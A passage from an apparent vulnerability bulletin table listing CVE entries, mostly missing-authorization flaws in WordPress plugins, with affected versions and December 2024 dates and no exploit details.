Missing Authorization vulnerability in Printful Printful Integration for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Printful Integration for WooCommerce: from n/a through 2.2.3. | 2024-12-13 | not yet calculated | CVE-2022-47168 |
| n/a -- n/a |
Missing Authorization vulnerability in Depicter Slider and Popup by Averta Depicter Slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Depicter Slider: from n/a through 1.9.0. | 2024-12-13 | not yet calculated | CVE-2022-47176 |
| n/a -- n/a |
Missing Authorization vulnerability in Wpexpertsio APIExperts Square for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects APIExperts Square for WooCommerce: from n/a through 4.4.1. | 2024-12-13 | not yet calculated | CVE-2022-47182 |
| n/a -- n/a |
Missing Authorization vulnerability in 8Degree Themes Coming Soon Landing Page and Maintenance Mode WordPress Plugin allows Retrieve Embedded Sensitive Data.This issue affects Coming Soon Landing Page and Maintenance Mode WordPress Plugin: from n/a through 2.2.0. | 2024-12-13 | not yet calculated | CVE-2022-47429 |
| n/a -- n/a |
Missing Authorization vulnerability in WPDeveloper Essential Blocks for Gutenberg allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Blocks for Gutenberg: from n/a through 3.8.5. | 2024-12-13 | not yet calculated | CVE-2022-47594 |
| n/a -- n/a |
Missing Authorization vulnerability in Survey Maker team Survey Maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Survey Maker: from n/a through 3.2.0. | 2024-12-13 | not yet calculated | CVE-2023-22697 |
| n/a -- n/a |
Missing Authorization vulnerability in Shopfiles Ltd Ebook Store allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ebook Store: from n/a through 5.775. | 2024-12-09 | not yet calculated | CVE-2023-22701 |
| n/a -- n/a |
Missing Authorization vulnerability in Karim Salman Kraken.io Image Optimizer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Kraken.io Image Optimizer: from n/a through 2.6.7. | 2024-12-09 | not yet calculated | CVE-2023-22708 |
| n/a -- n/a |
Missing Authorization vulnerability in JobBoardWP JobBoardWP - Job Board Listings and Submissions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JobBoardWP - Job Board Listings and Submissions: from n/a through 1.2.2. | 2024-12-09 | not yet calculated | CVE-2023-23715 |
| n/a -- n/a |
Missing Authorization vulnerability in Zendesk Zendesk Support for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zendesk Support for WordPress: from n/a through 1.8.4. | 2024-12-09 | not yet calculated | CVE-2023-23716 |
| n/a -- n/a |
Missing Authorization vulnerability in Chris Baldelomar Shortcodes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shortcodes: from n/a through 3.46. | 2024-12-09 | not yet calculated | CVE-2023-23725 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Tickera.com Tickera allows Cross Site Request Forgery.This issue affects Tickera: from n/a through 3.5.1.0. | 2024-12-09 | not yet calculated | CVE-2023-23726 |
| n/a -- n/a |
Missing Authorization vulnerability in CodePeople CP Multi View Event Calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CP Multi View Event Calendar : from n/a through 1.4.13. | 2024-12-09 | not yet calculated | CVE-2023-23814 |
| n/a -- n/a |
Missing Authorization vulnerability in Clever Widgets Enhanced Text Widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Enhanced Text Widget: from n/a through 1.5.8. | 2024-12-09 | not yet calculated | CVE-2023-23823 |
| n/a -- n/a |
Missing Authorization vulnerability in Brainstorm Force Spectra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Spectra: from n/a through 2.3.0. | 2024-12-09 | not yet calculated | CVE-2023-23825 |
| n/a -- n/a |
Missing Authorization vulnerability in Brainstorm Force Spectra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Spectra: from n/a through 2.3.0. | 2024-12-09 | not yet calculated | CVE-2023-23834 |
| n/a -- n/a |
Missing Authorization vulnerability in WPFactory Cost of Goods for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cost of Goods for WooCommerce: from n/a through 2.8.6. | 2024-12-09 | not yet calculated | CVE-2023-23868 |
| n/a -- n/a |
Missing Authorization vulnerability in mg12 WP-RecentComments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-RecentComments: from n/a through 2.2.7. | 2024-12-09 | not yet calculated | CVE-2023-23886 |
| n/a -- n/a |
Missing Authorization vulnerability in Shaon Easy Google Analytics for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Google Analytics for WordPress: from n/a through 1.6.0. | 2024-12-09 | not yet calculated | CVE-2023-23887 |
| n/a -- n/a |
Missing Authorization vulnerability in Igor Benic Simple Giveaways allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Giveaways: from n/a through 2.48.0. | 2024-12-09 | not yet calculated | CVE-2023-23893 |
| n/a -- n/a |
Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Time Slots Booking Form: from n/a through 1.1.82. | 2024-12-09 | not yet calculated | CVE-2023-23895 |
| n/a -- n/a |
Missing Authorization vulnerability in Fullworks Quick Event Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Event Manager: from n/a through 9.7.4. | 2024-12-09 | not yet calculated | CVE-2023-23975 |
| n/a -- n/a |
Missing Authorization vulnerability in Noah Hearle, Design Extreme Reviews and Rating - Google My Business allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reviews and Rating - Google My Business: from n/a through 4.14. | 2024-12-09 | not yet calculated | CVE-2023-23986 |
| n/a -- n/a |
Missing Authorization vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn): from n/a through 7.5.14. | 2024-12-09 | not yet calculated | CVE-2023-24375 |
| n/a -- n/a |
Missing Authorization vulnerability in WpDevArt Booking calendar, Appointment Booking System allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking calendar, Appointment Booking System: from n/a through 3.2.3. | 2024-12-09 | not yet calculated | CVE-2023-24407 |
| n/a -- n/a |
Missing Authorization vulnerability in PayPal PayPal Brasil para WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PayPal Brasil para WooCommerce: from n/a through 1.4.2. | 2024-12-09 | not yet calculated | CVE-2023-25026 |
| n/a -- n/a |
Missing Authorization vulnerability in Fullworks Quick Contact Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Contact Form : from n/a through 8.0.3.1. | 2024-12-09 | not yet calculated | CVE-2023-25035 |
| n/a -- n/a |
Missing Authorization vulnerability in CodePeople Booking Calendar Contact Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking Calendar Contact Form: from n/a through 1.2.34. | 2024-12-09 | not yet calculated | CVE-2023-25037 |
| n/a -- n/a |
Missing Authorization vulnerability in Fantastic Plugins Fantastic Content Protector Free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fantastic Content Protector Free: from n/a through 2.6. | 2024-12-09 | not yet calculated | CVE-2023-25048 |
| n/a -- n/a |
Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Album and Image Gallery plus Lightbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Album and Image Gallery plus Lightbox: from n/a through 1.6.2. | 2024-12-09 | not yet calculated | CVE-2023-25060 |
| n/a -- n/a |
Missing Authorization vulnerability in Noah Hearle, Design Extreme We're Open! allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects We're Open!: from n/a through 1.45. | 2024-12-09 | not yet calculated | CVE-2023-25067 |
| n/a -- n/a |
Missing Authorization vulnerability in Nate Reist Protected Posts Logout Button allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Protected Posts Logout Button: from n/a through 1.4.5. | 2024-12-09 | not yet calculated | CVE-2023-25454 |
| n/a -- n/a |
Missing Authorization vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn): from n/a through 7.6.0. | 2024-12-09 | not yet calculated | CVE-2023-25455 |
| n/a -- n/a |
Missing Authorization vulnerability in Magazine3 Easy Table of Contents allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Table of Contents: from n/a through 2.0.45.2. | 2024-12-09 | not yet calculated | CVE-2023-25469 |
| n/a -- n/a |
Missing Authorization vulnerability in Migrate Clone allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Clone: from n/a through 2.3.7. | 2024-12-09 | not yet calculated | CVE-2023-25486 |
| n/a -- n/a |
Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Meta slider and carousel with lightbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Meta slider and carousel with lightbox: from n/a through 1.6.2. | 2024-12-09 | not yet calculated | CVE-2023-25703 |
| n/a -- n/a |
Missing Authorization vulnerability in Fullworks Quick Paypal Payments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Paypal Payments: from n/a through 5.7.25. | 2024-12-09 | not yet calculated | CVE-2023-25714 |
| n/a -- n/a |
Missing Authorization vulnerability in Cadus Pro Fontiran allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fontiran: from n/a through 2.1. | 2024-12-09 | not yet calculated | CVE-2023-25791 |
| n/a -- n/a |
Missing Authorization vulnerability in Apollo13Themes Apollo13 Framework Extensions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Apollo13 Framework Extensions: from n/a through 1.8.10. | 2024-12-09 | not yet calculated | CVE-2023-25959 |
| n/a -- n/a |
Missing Authorization vulnerability in Ninja Team Filebird allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Filebird: from n/a through 5.1.4. | 2024-12-09 | not yet calculated | CVE-2023-25966 |
| n/a -- n/a |
Missing Authorization vulnerability in Video Gallery by Total-Soft Video Gallery - YouTube Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Video Gallery - YouTube Gallery: from n/a through 1.7.6. | 2024-12-13 | not yet calculated | CVE-2023-25988 |
| n/a -- n/a |
Missing Authorization vulnerability in WebberZone Top 10 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Top 10: from n/a through 3.2.3. | 2024-12-09 | not yet calculated | CVE-2023-25993 |
| n/a -- n/a |
Missing Authorization vulnerability in Max Chirkov Advanced Text Widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Text Widget : from n/a through 2.1.2. | 2024-12-09 | not yet calculated | CVE-2023-26520 |
| n/a -- n/a |
Missing Authorization vulnerability in OneWebsite WP Repost allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Repost: from n/a through 0.1. | 2024-12-09 | not yet calculated | CVE-2023-26522 |
| n/a -- n/a |
Missing Authorization vulnerability in Damir Calusic WP users media allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP users media: from n/a through 4.2.3. | 2024-12-09 | not yet calculated | CVE-2023-27428 |
| n/a -- n/a |
Missing Authorization vulnerability in TotalSuite Total Poll Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Total Poll Lite: from n/a through 4.8.6. | 2024-12-09 | not yet calculated | CVE-2023-27449 |
| n/a -- n/a |
Missing Authorization vulnerability in Apollo13Themes Rife Elementor Extensions & Templates allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rife Elementor Extensions & Templates: from n/a through 1.1.10. | 2024-12-09 | not yet calculated | CVE-2023-27454 |
| n/a -- n/a |
Missing Authorization vulnerability in HashThemes Total allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Total: from n/a through 2.1.19. | 2024-12-13 | not yet calculated | CVE-2023-27456 |
| n/a -- n/a |
Missing Authorization vulnerability in Paul Ryley Site Reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Site Reviews: from n/a through 6.5.0. | 2024-12-09 | not yet calculated | CVE-2023-27625 |
| n/a -- n/a |
Missing Authorization vulnerability in Aleksandar Uroševic Stock Ticker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stock Ticker: from n/a through 3.23.0. | 2024-12-09 | not yet calculated | CVE-2023-27626 |
| n/a -- n/a |
Missing Authorization vulnerability in Tech Banker Backup Bank: WordPress Backup Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backup Bank: WordPress Backup Plugin: from n/a through 4.0.28. | 2024-12-09 | not yet calculated | CVE-2023-28165 |
| n/a -- n/a |
Missing Authorization vulnerability in Jerod Santo WordPress Console allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Console: from n/a through 0.3.9. | 2024-12-09 | not yet calculated | CVE-2023-28168 |
| n/a -- n/a |
Missing Authorization vulnerability in Sparkle Themes Chankhe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chankhe: from n/a through 1.0.5. | 2024-12-09 | not yet calculated | CVE-2023-28416 |
| n/a -- n/a |
Missing Authorization vulnerability in AlexaCRM Dynamics 365 Integration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dynamics 365 Integration: from n/a through 1.3.12. | 2024-12-09 | not yet calculated | CVE-2023-28417 |
| n/a -- n/a |
Missing Authorization vulnerability in wpdirectorykit.com Real Estate Directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Real Estate Directory: from n/a through 1.0.5. | 2024-12-09 | not yet calculated | CVE-2023-28532 |
| n/a -- n/a |
Missing Authorization vulnerability in Acato Branded Social Images allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Branded Social Images: from n/a through 1.1.0. | 2024-12-09 | not yet calculated | CVE-2023-28536 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in ThemeHunk TH Variation Swatches allows Cross Site Request Forgery.This issue affects TH Variation Swatches: from n/a through 1.2.7. | 2024-12-09 | not yet calculated | CVE-2023-28688 |
| n/a -- n/a |
Missing Authorization vulnerability in JoomSky JS Job Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JS Job Manager: from n/a through 2.0.0. | 2024-12-09 | not yet calculated | CVE-2023-28689 |
| n/a -- n/a |
Missing Authorization vulnerability in HashThemes Viral Mag allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Viral Mag: from n/a through 1.0.9. | 2024-12-13 | not yet calculated | CVE-2023-28990 |
| n/a -- n/a |
Missing Authorization vulnerability in AWESOME TOGI Product Category Tree allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Category Tree: from n/a through 2.5. | 2024-12-09 | not yet calculated | CVE-2023-29173 |
| n/a -- n/a |
Missing Authorization vulnerability in Muhammad Rehman Remove Duplicate Posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Remove Duplicate Posts: from n/a through 1.3.5. | 2024-12-09 | not yet calculated | CVE-2023-29237 |
| n/a -- n/a |
Missing Authorization vulnerability in LuckyWP LuckyWP Scripts Control allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LuckyWP Scripts Control: from n/a through 1.2.1. | 2024-12-09 | not yet calculated | CVE-2023-29239 |
| n/a -- n/a |
Missing Authorization vulnerability in AlexaCRM Dynamics 365 Integration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dynamics 365 Integration: from n/a through 1.3.13. | 2024-12-09 | not yet calculated | CVE-2023-29422 |
| n/a -- n/a |
Missing Authorization vulnerability in WPEverest User Registration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects User Registration: from n/a through 2.3.2.1. | 2024-12-09 | not yet calculated | CVE-2023-29429 |
| n/a -- n/a |
Missing Authorization vulnerability in OntheGoSystems qTranslate X Cleanup and WPML Import allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects qTranslate X Cleanup and WPML Import: from n/a through 3.0.1. | 2024-12-09 | not yet calculated | CVE-2023-29431 |
| n/a -- n/a |
Missing Authorization vulnerability in ??? tencentcloud-cos allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects tencentcloud-cos: from n/a through 1.0.7. | 2024-12-09 | not yet calculated | CVE-2023-29433 |
| n/a -- n/a |
In Menlo On-Premise Appliance before 2.88, web policy may not be consistently applied properly to intentionally malformed client requests. This is fixed in 2.88.2+, 2.89.1+, and 2.90.1+. | 2024-12-14 | not yet calculated | CVE-2023-29476 |
| n/a -- n/a |
Missing Authorization vulnerability in Sparkle Themes Blogger Buzz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Blogger Buzz: from n/a through 1.2.2. | 2024-12-09 | not yet calculated | CVE-2023-30476 |
| n/a -- n/a |
Missing Authorization vulnerability in Stamped.io Stamped.io Product Reviews & UGC for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stamped.io Product Reviews & UGC for WooCommerce: from n/a through 2.3.2. | 2024-12-09 | not yet calculated | CVE-2023-30479 |
| n/a -- n/a |
Missing Authorization vulnerability in HashThemes Square allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Square: from n/a through 2.0.0. | 2024-12-09 | not yet calculated | CVE-2023-30486 |
| n/a -- n/a |
Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Featured Post Creative allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Post Creative: from n/a through 1.2.7. | 2024-12-09 | not yet calculated | CVE-2023-30488 |
| n/a -- n/a |
Missing Authorization vulnerability in Matthew Ruddy Easing Slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easing Slider : from n/a through 3.0.8. | 2024-12-13 | not yet calculated | CVE-2023-30490 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nikola Loncar Easy Appointments allows Stored XSS.This issue affects Easy Appointments: from n/a through 3.10.7. | 2024-12-09 | not yet calculated | CVE-2023-30748 |
| n/a -- n/a |
Missing Authorization vulnerability in YummyWP Smart WooCommerce Search allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart WooCommerce Search: from n/a through 2.5.0. | 2024-12-09 | not yet calculated | CVE-2023-30783 |
| n/a -- n/a |
Missing Authorization vulnerability in wooproductimporter Sharkdropship for AliExpress Dropship and Affiliate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sharkdropship for AliExpress Dropship and Affiliate: from n/a through 2.2.3. | 2024-12-09 | not yet calculated | CVE-2023-30870 |
| n/a -- n/a |
Missing Authorization vulnerability in Fahad Mahmood WP Docs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Docs: from n/a through 1.9.8. | 2024-12-09 | not yet calculated | CVE-2023-30873 |
| n/a -- n/a |
Missing Authorization vulnerability in Jose Vega Display custom fields in the frontend - Post and User Profile Fields allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Display custom fields in the frontend - Post and User Profile Fields: from n/a through 1.2.0. | 2024-12-09 | not yet calculated | CVE-2023-31073 |
| n/a -- n/a |
Missing Authorization vulnerability in Arul Prasad J WP Quick Post Duplicator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Quick Post Duplicator: from n/a through 2.0. | 2024-12-09 | not yet calculated | CVE-2023-31214 |
| n/a -- n/a |
Missing Authorization vulnerability in Felix Welberg Extended Post Status allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Extended Post Status: from n/a through 1.0.19. | 2024-12-09 | not yet calculated | CVE-2023-32094 |
| n/a -- n/a |
Missing Authorization vulnerability in SoftLab Integrate Google Drive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Integrate Google Drive: from n/a through 1.1.99. | 2024-12-09 | not yet calculated | CVE-2023-32117 |
| n/a -- n/a |
Missing Authorization vulnerability in WPoperation SALERT allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SALERT: from n/a through 1.2.1. | 2024-12-09 | not yet calculated | CVE-2023-32126 |
| n/a -- n/a |
Missing Authorization vulnerability in Realwebcare WRC Pricing Tables allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WRC Pricing Tables: from n/a through 2.3.7. | 2024-12-09 | not yet calculated | CVE-2023-32293 |
| n/a -- n/a |
Missing Authorization vulnerability in anzia Ni WooCommerce Sales Report allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ni WooCommerce Sales Report: from n/a through 3.7.3. | 2024-12-09 | not yet calculated | CVE-2023-32299 |
| n/a -- n/a |
Missing Authorization vulnerability in Link Whisper Link Whisper Free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Link Whisper Free: from n/a through 0.6.3. | 2024-12-13 | not yet calculated | CVE-2023-32506 |
| n/a -- n/a |
Missing Authorization vulnerability in wp3sixty Woo Custom Emails allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woo Custom Emails: from n/a through 2.2. | 2024-12-13 | not yet calculated | CVE-2023-32507 |
| n/a -- n/a |
Missing Authorization vulnerability in Webcodin WCP Contact Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCP Contact Form: from n/a through 3.1.0. | 2024-12-13 | not yet calculated | CVE-2023-32519 |
| n/a -- n/a |
Missing Authorization vulnerability in Webcodin WCP Contact Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCP Contact Form: from n/a through 3.1.0. | 2024-12-13 | not yet calculated | CVE-2023-32520 |
| n/a -- n/a |
Missing Authorization vulnerability in Fahad Mahmood Injection Guard allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Injection Guard: from n/a through 1.2.1. | 2024-12-13 | not yet calculated | CVE-2023-32574 |
| n/a -- n/a |
Missing Authorization vulnerability in MobileMonkey WP-Chatbot for Messenger allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-Chatbot for Messenger: from n/a through 4.7. | 2024-12-13 | not yet calculated | CVE-2023-32581 |
| n/a -- n/a |
Missing Authorization vulnerability in Total-Soft Portfolio Gallery - Responsive Image Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Portfolio Gallery - Responsive Image Gallery: from n/a through 1.4.6. | 2024-12-13 | not yet calculated | CVE-2023-32585 |
| n/a -- n/a |
Missing Authorization vulnerability in Thomas Michalak Soundcloud Is Gold allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Soundcloud Is Gold: from n/a through 2.5.1. | 2024-12-13 | not yet calculated | CVE-2023-32586 |
| n/a -- n/a |
Missing Authorization vulnerability in GS Plugins GS Pins for Pinterest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GS Pins for Pinterest: from n/a through 1.6.7. | 2024-12-13 | not yet calculated | CVE-2023-32593 |
| n/a -- n/a |
Missing Authorization vulnerability in Bill Minozzi reCAPTCHA for all allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects reCAPTCHA for all: from n/a through 1.22. | 2024-12-13 | not yet calculated | CVE-2023-32599 |
| n/a -- n/a |
Missing Authorization vulnerability in Booking Ultra Pro Booking Ultra Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking Ultra Pro: from n/a through 1.1.12. | 2024-12-13 | not yet calculated | CVE-2023-32601 |
| n/a -- n/a |
Missing Authorization vulnerability in 10up Simple Page Ordering allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Page Ordering: from n/a through 2.5.0. | 2024-12-13 | not yet calculated | CVE-2023-32798 |
| n/a -- n/a |
Missing Authorization vulnerability in a3rev Software WooCommerce Predictive Search allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Predictive Search: from n/a through 5.8.0. | 2024-12-13 | not yet calculated | CVE-2023-32963 |
| n/a -- n/a |
Missing Authorization vulnerability in Tagbox Taggbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Taggbox: from n/a through 3.3. | 2024-12-13 | not yet calculated | CVE-2023-33215 |
| n/a -- n/a |
Missing Authorization vulnerability in wppal Easy Captcha allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Captcha: from n/a through 1.0. | 2024-12-13 | not yet calculated | CVE-2023-33324 |
| n/a -- n/a |
Missing Authorization vulnerability in WebToffee WordPress Backup & Migration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Backup & Migration: from n/a through 1.4.0. | 2024-12-13 | not yet calculated | CVE-2023-33928 |
| n/a -- n/a |
Missing Authorization vulnerability in Jason Crouse, VeronaLabs Slimstat Analytics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slimstat Analytics: from n/a through 5.0.5.1. | 2024-12-13 | not yet calculated | CVE-2023-33994 |
| n/a -- n/a |
Missing Authorization vulnerability in Photo Gallery Team Photo Gallery by 10Web allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Photo Gallery by 10Web: from n/a through 1.8.15. | 2024-12-13 | not yet calculated | CVE-2023-33995 |
| n/a -- n/a |
Missing Authorization vulnerability in ?leanTalk - Anti-Spam Protection Spam protection, AntiSpam, FireWall by CleanTalk allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Spam protection, AntiSpam, FireWall by CleanTalk: from n/a through 6.10. | 2024-12-13 | not yet calculated | CVE-2023-33996 |
| n/a -- n/a |
Missing Authorization vulnerability in cybernetikz Easy Social Icons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Social Icons: from n/a through 3.2.5. | 2024-12-13 | not yet calculated | CVE-2023-33998 |
| n/a -- n/a |
Missing Authorization vulnerability in Inisev Social Media & Share Icons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Social Media & Share Icons: from n/a through 2.8.1. | 2024-12-13 | not yet calculated | CVE-2023-34009 |
| n/a -- n/a |
Missing Authorization vulnerability in G5Theme Grid Plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Grid Plus: from n/a through 1.3.2. | 2024-12-13 | not yet calculated | CVE-2023-34014 |
| n/a -- n/a |
Missing Authorization vulnerability in Uncanny Owl Uncanny Toolkit for LearnDash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Uncanny Toolkit for LearnDash: from n/a through 3.6.4.3. | 2024-12-13 | not yet calculated | CVE-2023-34019 |
| n/a -- n/a |
Missing Authorization vulnerability in Rextheme Change WooCommerce Add To Cart Button Text allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Change WooCommerce Add To Cart Button Text: from n/a through 1.3. | 2024-12-13 | not yet calculated | CVE-2023-34376 |
| n/a -- n/a |
Missing Authorization vulnerability in Gesundheit Bewegt GmbH Zippy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zippy: from n/a through 1.6.2. | 2024-12-13 | not yet calculated | CVE-2023-34381 |
| n/a -- n/a |
Missing Authorization vulnerability in Constant Contact Constant Contact Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Constant Contact Forms: from n/a through 2.0.3. | 2024-12-13 | not yet calculated | CVE-2023-34387 |
| n/a -- n/a |
Missing Authorization vulnerability in Surfer Surfer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Surfer: from n/a through 1.3.2.357. | 2024-12-13 | not yet calculated | CVE-2023-35037 |
| n/a -- n/a |
Missing Authorization vulnerability in Dynamic.ooo Dynamic Visibility for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dynamic Visibility for Elementor: from n/a through 5.0.5. | 2024-12-13 | not yet calculated | CVE-2023-35046 |
| n/a -- n/a |
Missing Authorization vulnerability in Cimatti Consulting Contact Forms by Cimatti allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Forms by Cimatti: from n/a through 1.5.7. | 2024-12-13 | not yet calculated | CVE-2023-35051 |
| n/a -- n/a |
Missing Authorization vulnerability in wpWax - WP Business Directory Plugin and Classified Listings Directory Directorist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directorist: from n/a through 7.5.4. | 2024-12-13 | not yet calculated | CVE-2023-35052 |
| n/a -- n/a |
Missing Authorization vulnerability in The Events Calendar The Events Calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Events Calendar: from n/a through 6.1.2.2. | 2024-12-13 | not yet calculated | CVE-2023-35777 |
| n/a -- n/a |
Missing Authorization vulnerability in Jegstudio Gutenverse allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gutenverse: from n/a through 1.8.5. | 2024-12-13 | not yet calculated | CVE-2023-35875 |
| n/a -- n/a |
Missing Authorization vulnerability in YITH YITH WooCommerce Waiting List allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YITH WooCommerce Waiting List: from n/a through 2.13.0. | 2024-12-13 | not yet calculated | CVE-2023-36506 |
| n/a -- n/a |
Missing Authorization vulnerability in Suresh Chand CHP Ads Block Detector allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CHP Ads Block Detector: from n/a through 3.9.5. | 2024-12-13 | not yet calculated | CVE-2023-36509 |
| n/a -- n/a |
Missing Authorization vulnerability in Reservation Diary ReDi Restaurant Reservation allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ReDi Restaurant Reservation: from n/a through 23.0211. | 2024-12-13 | not yet calculated | CVE-2023-36510 |
| n/a -- n/a |
Missing Authorization vulnerability in Hugh Lashbrooke Post Hit Counter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Hit Counter: from n/a through 1.3.2. | 2024-12-13 | not yet calculated | CVE-2023-36518 |
| n/a -- n/a |
Missing Authorization vulnerability in wpthemego SW Product Bundles allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SW Product Bundles: from n/a through 2.0.15. | 2024-12-13 | not yet calculated | CVE-2023-36519 |
| n/a -- n/a |
